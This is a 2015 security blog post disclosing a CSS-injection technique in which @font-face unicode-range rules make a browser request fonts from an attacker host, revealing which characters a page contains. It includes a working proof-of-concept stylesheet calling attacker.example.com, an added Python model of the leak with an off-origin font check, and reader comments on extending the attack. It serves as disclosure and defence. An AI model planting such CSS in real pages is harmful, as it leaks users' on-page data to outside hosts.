Friday, October 23, 2015

CSS based Attack: Abusing unicode-range of @font-face

In this post, I would like to share a new CSS-based attack that abuses the unicode-range descriptor of the @font-face rule.

Using this technique, an attacker can partially read a page's text with CSS alone.
An attacker might use this technique in the following cases:

- Bypassing a browser's XSS filter (e.g. XSS Auditor does not block <style> injection)
- The target page allows only CSS injection

As far as I know, the known CSS-based attack can read attribute values (see Attribute Reader: http://p42.us/css/) but cannot read the characters of a text node. This vector can, though not perfectly :)

So far, this vector works in Chrome and Firefox Nightly 44.

Let's go:

<style>
@font-face {
  font-family: poc;
  src: url(http://attacker.example.com/?A); /* fetched */
  unicode-range: U+0041;
}
@font-face {
  font-family: poc;
  src: url(http://attacker.example.com/?B); /* fetched too */
  unicode-range: U+0042;
}
@font-face {
  font-family: poc;
  src: url(http://attacker.example.com/?C); /* not fetched */
  unicode-range: U+0043;
}
#sensitive-information {
  font-family: poc;
}
</style>
<p id="sensitive-information">AB</p>

When you open this page, Chrome and Firefox fetch "?A" and "?B" because the text node of sensitive-information contains the characters "A" and "B". They do not fetch "?C" because the text does not contain "C". This means we have been able to read "A" and "B": the font requests arriving at the attacker's server reveal which characters the text contains.

Let's see another example: http://vulnerabledoma.in/poc_unicode-range2.html

In DevTools you can see the external requests carrying the page's text (M, a, s, t, o, K, i, n, u, g, w), like the following:

[screenshot: DevTools network panel showing the font requests]

As you can see, we cannot tell whether a character appears more than once, since each font is fetched only once. But in cases like this PoC, I think it gives an attacker enough information.

I reported this trick to the Chrome team, but it has been marked WontFix (Issue 543078).

It seems that this behavior is specified; see EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/#composite-fonts. Thanks to this behavior, users save bandwidth, but as a side effect an attacker gets a new attack vector.
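The following is an added example, not code from the original post or from any browser. It models the lazy font loading described above (a face is downloaded only when the rendered text contains a character inside its unicode-range), so you can see exactly what a font server observes and why duplicate characters are lost, and it adds the check a site owner would run over a stylesheet assembled from untrusted input: which @font-face sources point to another origin. The parser is a simplified regex model of the CSS, the `POC_CSS` sample is the PoC from this post, and the origin `https://victim.example` is an assumed placeholder.

```python
# Added example, not code from the original post. Models the lazy font
# loading the post describes and lists off-origin @font-face sources.
import re
from typing import List, Optional, Set
from urllib.parse import urlsplit

# The PoC stylesheet from the post, embedded here as sample input.
POC_CSS = """
@font-face{ font-family:poc; src: url(http://attacker.example.com/?A); unicode-range:U+0041; }
@font-face{ font-family:poc; src: url(http://attacker.example.com/?B); unicode-range:U+0042; }
@font-face{ font-family:poc; src: url(http://attacker.example.com/?C); unicode-range:U+0043; }
#sensitive-information{ font-family:poc; }
"""

FONT_FACE_RE = re.compile(r"@font-face\s*\{([^}]*)\}", re.IGNORECASE)
DESC_RE = re.compile(r"([\w-]+)\s*:\s*([^;]+)")
URL_RE = re.compile(r"url\(\s*(['\"]?)(.*?)\1\s*\)", re.IGNORECASE)


def parse_unicode_range(value: str) -> Set[int]:
    """Expand a unicode-range descriptor into code points.
    Handles single values (U+0041), ranges (U+0041-005A) and wildcards (U+4?)."""
    points: Set[int] = set()
    for token in value.split(","):
        token = token.strip().upper()
        if not token.startswith("U+"):
            raise ValueError(f"bad unicode-range token: {token!r}")
        body = token[2:]
        if "-" in body:
            lo, hi = body.split("-", 1)
            points.update(range(int(lo, 16), int(hi, 16) + 1))
        elif "?" in body:
            points.update(range(int(body.replace("?", "0"), 16),
                                int(body.replace("?", "F"), 16) + 1))
        else:
            points.add(int(body, 16))
    return points


def parse_font_faces(css: str) -> List[dict]:
    """One dict per @font-face rule: family, src URL and covered code points
    (None means no unicode-range was given, i.e. the face covers everything)."""
    css = re.sub(r"/\*.*?\*/", "", css, flags=re.DOTALL)  # drop CSS comments
    faces = []
    for body in FONT_FACE_RE.findall(css):
        descs = {k.strip().lower(): v.strip() for k, v in DESC_RE.findall(body)}
        url_match = URL_RE.search(descs.get("src", ""))
        rng: Optional[str] = descs.get("unicode-range")
        faces.append({
            "family": descs.get("font-family", ""),
            "url": url_match.group(2) if url_match else None,
            "points": parse_unicode_range(rng) if rng else None,
        })
    return faces


def fetched_urls(css: str, text: str) -> List[str]:
    """URLs a browser following the lazy-loading rule requests when `text` is
    rendered in the declared family. Only membership matters, so the result
    reveals the set of distinct characters, never their count or position."""
    urls = []
    for face in parse_font_faces(css):
        if face["url"] is None:
            continue
        covered = face["points"]
        if covered is None or any(ord(ch) in covered for ch in text):
            urls.append(face["url"])
    return urls


def offsite_font_sources(css: str, page_origin: str) -> List[str]:
    """Defender-side check for stylesheets built from untrusted input: every
    @font-face src that would be requested from a different origin."""
    base = urlsplit(page_origin)
    offenders = []
    for face in parse_font_faces(css):
        url = face["url"]
        if url is None:
            continue
        parts = urlsplit(url)
        scheme = parts.scheme or base.scheme  # protocol-relative URLs keep the page scheme
        if parts.netloc and (scheme, parts.netloc) != (base.scheme, base.netloc):
            offenders.append(url)
    return offenders


if __name__ == "__main__":
    print(fetched_urls(POC_CSS, "AB"))    # ?A and ?B requested, ?C is not
    print(fetched_urls(POC_CSS, "BAAB"))  # the same two requests: duplicates are invisible
    print(offsite_font_sources(POC_CSS, "https://victim.example"))
```

The `offsite_font_sources` check is only a review aid for CSS you assemble server-side; the browser-side enforcement that actually stops the requests is a Content Security Policy whose `font-src` directive does not include the attacker's origin (for example `font-src 'self'`), which applies even when the injected stylesheet itself is not under your control.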

11 comments:

  1. This is a really interesting way to exploit that the browser will go through all specified fonts, even if it's a hundred and none exists, it's still a request made.
  2. You can easily use that for input fields, except the password type...

  3. any work-around to make duplicated characters work?

  4. It could be possible to figure out character combinations using ligatures. I'm not sure if it's possible to make the requests to remote server for ligatures other than those defined as separate characters in UNICODE (in practice, only ff, ffi, fi).

    A custom font could be used to make all character combinations different widths or heights and somehow try to leak the width or height of the element to a remote server.